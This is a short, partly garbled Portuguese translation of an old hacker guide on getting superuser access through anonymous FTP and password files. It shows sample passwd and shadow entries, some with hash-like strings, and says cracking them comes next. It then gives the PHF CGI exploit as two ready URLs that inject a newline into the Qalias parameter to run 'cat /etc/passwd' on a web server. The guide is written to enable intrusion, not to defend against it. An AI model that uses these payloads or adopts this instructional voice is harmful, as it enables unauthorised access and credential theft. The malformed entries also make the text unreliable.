Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Ok, bem, uma das maneiras mais fáceis de obter acesso de superusuário é por meio de
acesso ftp anônimo a uma página da web. Primeiro você precisa aprender um pouco
sobre
o arquivo de senha...
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/ csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
root:x:0:1:Superusuário:/:
ftp:x:202:102:Anônimo ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrador:/u1/ftp
Este é outro exemplo de arquivo de senha, só que este tem uma pequena
diferença, é sombreado. Os arquivos de senha ocultos não permitem visualizar ou
copiar a senha criptografada real. Isso causa problemas para o cracker de senhas
e para o criador de dicionários (ambos explicados posteriormente no texto). Abaixo
está
outro exemplo de um arquivo de senha oculta:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000 ):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5 :0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
ninguém: x:60001:60001:uid sem corpo:/:
noaccess:x:60002:60002:uid sem acesso:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin /false
Arquivos de senha sombreados têm um "x" no lugar de uma senha ou, às vezes
, também estão disfarçados de *.
Agora que você sabe um pouco mais sobre a aparência do arquivo de senha real
, você deve ser capaz de identificar um pw criptografado normal de um
arquivo pw sombreado. Agora podemos falar sobre como quebrá-lo.
A técnica PHF
Bem, eu não tinha certeza se deveria incluir esta seção devido ao fato de que
todos já a conhecem e a maioria dos servidores já descobriu
o bug e o corrigiu. Mas desde que me fizeram perguntas sobre o pff
, decidi incluí-lo.
http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/ passwd